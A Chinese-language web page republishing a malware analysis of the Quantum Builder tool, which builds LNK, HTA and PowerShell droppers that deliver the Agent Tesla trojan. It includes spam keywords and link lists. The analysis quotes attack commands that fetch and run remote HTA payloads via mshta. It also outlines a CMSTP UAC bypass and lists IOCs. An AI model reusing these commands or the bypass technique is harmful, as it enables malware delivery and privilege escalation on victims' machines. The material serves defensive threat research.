当前位置: 首页 > news >正文

网站开发者账号购买ps工具设计网站

网站开发者账号购买,ps工具设计网站,做外包网站摘要,怎么建设网站最便宜Zscaler 的研究人员发现暗网上正在出售名为 Quantum Builder 的构建工具#xff0c;该工具可以投递 .NET 远控木马 Agent Tesla。与过去的攻击行动相比#xff0c;本次攻击转向使用 LNK 文件。 Quantum Builder 能够创建恶意文件#xff0c;如 LNK、HTA 与 PowerShell…Zscaler 的研究人员发现暗网上正在出售名为 Quantum Builder 的构建工具该工具可以投递 .NET 远控木马 Agent Tesla。与过去的攻击行动相比本次攻击转向使用 LNK 文件。 Quantum Builder 能够创建恶意文件如 LNK、HTA 与 PowerShell最后投递 Agent Tesla。攻击者使用复杂的技术来生成 Payload 使用 CMSTP 绕过用户账户控制以便以管理权限执行最终 Payload 并关闭 Windows Defender 利用集成了无文件攻击等多种攻击向量的多阶段感染链 在内存中执行 PowerShell 脚本以进行逃避检测 打开诱饵分散受害者的注意力 后文对感染链进行了深入分析并对 Quantum Builder 生成的 Payload 进行了比较。 感染链 感染链始于鱼叉邮件其中包含一个携带 GZIP 文档的 LNK 文件。执行 LNK 文件后嵌入的 PowerShell 代码会生成 MSHTA 来执行远程服务器上的 HTA 文件。 感染链 HTA 文件解密 PowerShell 脚本在执行 AES 解密和 GZIP 解压缩后解密并加载另一个 PowerShell 脚本。解密后的 PowerShell 脚本是一个 Downloader通过远程服务器下载 Agent Tesla再使用 CMSTP 绕过 UAC 以管理权限执行。 技术分析 鱼叉邮件的主题为订单确认如下所示 鱼叉邮件 邮件带有一个 GZIP 文件作为附件与带有 PDF 图标的恶意 LNK 文件捆绑在一起。执行后 LNK 文件会运行混淆的 PowerShell 代码经过 base64 解编码与异或解密得到执行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta。 执行混淆代码 通过 MSHTA 执行远程服务器上的 HTA 文件 HTA 文件包含多个千余行的垃圾 VBS 函数其中只有一个与恶意行为有关。 HTA 主要函数 解密出来的 PowerShell 脚本如下所示 解密 PowerShell 代码 解密完成后恶意函数就会通过 CreateObject() 创建一个 Wscript.Shell 对象然后通过 Run 方法执行解密后的 PowerShell 脚本。 PowerShell 代码执行 解密的代码以隐藏窗口的形式执行解密后会获取另一个 PowerShell 代码。 执行新的 PowerShell 代码 IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码 从远程服务器下载 Agent Tesla 的 Payload 执行 CMSTP 绕过 UAC 通过操作文件属性隐藏 Agent Tesla Agent Tesla 被硬编码命名为 MuUQDuaFNoGmHQE.exe并且被最终执行 解密 PowerShell 代码 解密可获取 Agent Tesla 的部署地址 URL 解密 下载 Agent Tesla 通过 WriteAllBytes() 函数写入磁盘路径为 C:\Users\username\AppData\Roaming\MuUQDuaFNoGmHQE.exe 写入指定位置 Agent Tesla 二进制文件的路径作为参数传递给 PowerShell 脚本中的 CMSTP UAC Bypass 函数。该函数最初解码一个特别大的、base64 编码的数据块如下所示 CMSTP UAC Bypass 解码后的代码是基于 PowerShell 的 CMSTP UAC Bypass PoC在 [GitHub](https://github.com/tylerapplebaum/CMSTP- UACBypass/blob/master/UACBypassCMSTP.ps1)上也能够找到。基于 PowerShell 的 CMSTP UAC 绕过 PoC 脚本在执行时会在 Temp 目录中写入恶意 INF 文件其中 PowerShell 脚本中的 $CommandToExecute变量是 Agent Tesla 二进制文件的路径。 恶意 INF 文件 将 INF 文件写入临时目录后PowerShell 代码会生成一个新进程 cmstp.exe并以 /au $InfFileLocation作为参数然后安装恶意 INF 文件如下所示 恶意 INF 文件作为参数执行 CMSTP 在 cmstp.exe 安装 INF 文件时RunPreSetupCommandsSection 参数中的命令将以管理权限执行。该脚本将 [ENTER] 按键发送到活动的窗口应用程序以便使用 SendKeys.SendWait() 函数自动执行。 触发 UAC 绕过 当以恶意 INF 作为参数生成 cmstp.exe 时就会以管理权限执行恶意软件如下所示 UAC 绕过并以管理权限执行 Agent Tesla 的 CC 服务器被配置为 配置信息 CC 通信如下所示 CC 通信 PowerShell 代码还通过操作隐藏文件属性来隐藏 Agent Tesla 二进制文件如下所示 隐藏文件 攻击变化 感染链的另一个变种LNK 文件被捆绑在 ZIP 压缩包中。通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA 文件。通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件如下所示。 通过 LNK 执行 HTA 文件 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。 HTA 文件解密 PowerShell 代码 除了 Run() 方法之外在某些情况下HTA 文件利用 ShellExecute() 方法执行 PowerShell 代码如下所示 通过 ShellExecute() 执行代码 下载落地后使用 Start-Process() 从 AppData 路径执行 Agent Tesla。如果 Payload 的扩展名为 .dll则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。 通过解密的 PowerShell 代码下载并执行 Agent Tesla 在某些情况下还会有在内存中解密的 PowerShell 代码。代码使用 Invoke-Item 函数下载并执行了一个诱饵文件以此来分散受害者的注意力如下所示 诱饵执行 CC 服务器的配置为 配置信息 CC 通信如下所示 CC 通信 Quantum 这些恶意文件都是由名为 Quantum Builder 的构建工具创建的如下所示 Quantum Builder HTA 生成工具 HTA 生成工具如下所示 HTA 生成工具 用户输入传递给 HTA Builder 函数以构造 HTA 文件如下所示 HTA 生成工具 将此代码与之前分析的 HTA 代码比较可以确定 Payload 是由 Quantum Builder 生成的。 在野 HTA 文件 LNK 生成工具 LNK 生成工具如下所示 LNK 生成工具 快捷方式的构造参数有 Description、IconLocation、Target Path、Arguments 和 WindowStyle如下所示 LNK 生成工具 将此代码与之前分析的 LNK 代码比较可以确定 Payload 是由 Quantum Builder 生成的。 在野 LNK 文件 LNK 构建工具还可以生成 ISO 文件的 Payload如下所示 ISO 生成工具 Quantum Builder 已被攻击者多次利用部署了多个恶意软件家族 RedLine Stealer IcedID GuLoader RemcosRAT and AsyncRAT 结论 攻击者会不断更新技术手段利用各种恶意软件进行攻击。本次使用的 Agent Tesla 是最新的Quantum Builder 已经被应用在各种攻击活动中投递各种恶意样本。 IOC 3edfa0cf3b7d54c24013e4f0019dba20 bb914889d5edc6b56c666d2e44e1a437 1adc0bd494cd42578ac8c8e726d5ad92 31c341ad31224cc7d38a5c4e80ccb727 f931773a226809669cad91410a57267f d9433faddcaca526b26f713e27e2505f 213ada506251c477480bd14ea5507bf3 0ebb9d422f8e86458d8fa7f66fe1d0f1 563fda5da81a5e7818d771222e81f6c4 filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta 179[.]43[.]175[.]187/puao/PAYMENT[.]hta 179[.]43[.]175[.]187/puao/PO-M6888722[.]hta filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe 179[.]43[.]175[.]187/puao/PAYMENTS[.]exe 179[.]43[.]175[.]187/puao/PO-M6888757[.]exe mail[.]thesharpening.com[.]au ftp[.]qurvegraphics[.]com 最后 对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 同时每个成长路线对应的板块都有配套的视频提供 当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。 因篇幅有限仅展示部分资料有需要的小伙伴可以【扫下方二维码】免费领取
http://www.w-s-a.com/news/355422/

相关文章:

  • 做化妆品的一些网站企业网站建设与营运计划书
  • 重庆速代网络科技seo整站优化服务教程
  • 成都比较好的装修设计公司seo3的空间构型
  • 开发商建设审批网站成都创意设计公司
  • 百度快照比网站上线时间早wordpress新建阅读量字段
  • 国家工程建设标准化协会网站网站开发工具有
  • 上海网站建设集中公关公司组织架构图
  • wordpress副标题的作用百度网站标题优化
  • 大连哪家公司做网站比较好wordpress 判断用户组
  • 网站空间1g多少钱东莞公司高端网站建设
  • 网站服务器出错是什么意思做餐饮酒店网站
  • 房地产网站建设策划方案网站建设教程简笔画
  • 3d室内设计软件wordpress本地优化加速版
  • 南京高新区规划建设局网站石家庄哪里做网站比较好
  • 免费培训课程网站优化的方式
  • 做网站要固定电话在家自己做网站
  • 招聘网站开发视频新手如何做网站维护
  • flash 网站欣赏国外做的比较好的网站有哪些
  • 推广一个网站需要什么官网首页设计
  • 淘宝建设网站的理由企业官网建设哪家好
  • 青岛网站推wordpress主题切换
  • 天元建设集团有限公司资质郑州网站seo推广
  • 免费网站后台管理系统模板下载百度网盘app下载安装
  • 开封网站建设培训郑州高端网站建设哪家好
  • 东莞哪家做网站很有名的公司即墨专业医院网站制作公司
  • 做面食网站china cd wordpress
  • 门户网站 营销优秀建筑模型案例作品
  • 训做网站的心得体会范文中山市 有限公司网站建设
  • 服装电子商务网站建设过程与实现两学一做学习教育网站
  • 住房和城建设网站怎么用源码建站